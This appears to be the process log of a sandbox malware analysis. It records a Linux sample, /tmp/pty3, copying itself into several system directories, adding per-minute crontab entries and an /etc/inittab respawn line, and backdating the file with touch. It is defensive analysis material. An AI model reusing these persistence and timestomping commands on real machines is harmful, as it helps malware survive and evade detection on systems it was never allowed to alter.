                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/rm
                                                                                                                                          Arguments:rm -rf /etc/inittab2
                                                                                                                                          File size:72056 bytes
                                                                                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/touch
                                                                                                                                          Arguments:touch -acmr /bin/ls /etc/inittab
                                                                                                                                          File size:100728 bytes
                                                                                                                                          MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cp -f /tmp/pty3 /var/tmp/pty3"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cp
                                                                                                                                          Arguments:cp -f /tmp/pty3 /var/tmp/pty3
                                                                                                                                          File size:153976 bytes
                                                                                                                                          MD5 hash:40f10ae7ea3e44218d1a8c306f79c83f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep /var/tmp/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v "no cron"
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v /var/tmp/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab2
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "rm -rf /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/rm
                                                                                                                                          Arguments:rm -rf /etc/inittab2
                                                                                                                                          File size:72056 bytes
                                                                                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/touch
                                                                                                                                          Arguments:touch -acmr /bin/ls /etc/inittab
                                                                                                                                          File size:100728 bytes
                                                                                                                                          MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cp -f /tmp/pty3 /var/lock/pty3"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cp
                                                                                                                                          Arguments:cp -f /tmp/pty3 /var/lock/pty3
                                                                                                                                          File size:153976 bytes
                                                                                                                                          MD5 hash:40f10ae7ea3e44218d1a8c306f79c83f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep /var/lock/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v "no cron"
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v /var/lock/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:23
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab2
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "rm -rf /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/rm
                                                                                                                                          Arguments:rm -rf /etc/inittab2
                                                                                                                                          File size:72056 bytes
                                                                                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/touch
                                                                                                                                          Arguments:touch -acmr /bin/ls /etc/inittab
                                                                                                                                          File size:100728 bytes
                                                                                                                                          MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cp -f /tmp/pty3 /var/run/pty3"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cp
                                                                                                                                          Arguments:cp -f /tmp/pty3 /var/run/pty3
                                                                                                                                          File size:153976 bytes
                                                                                                                                          MD5 hash:40f10ae7ea3e44218d1a8c306f79c83f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep /var/run/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v "no cron"
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:24
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

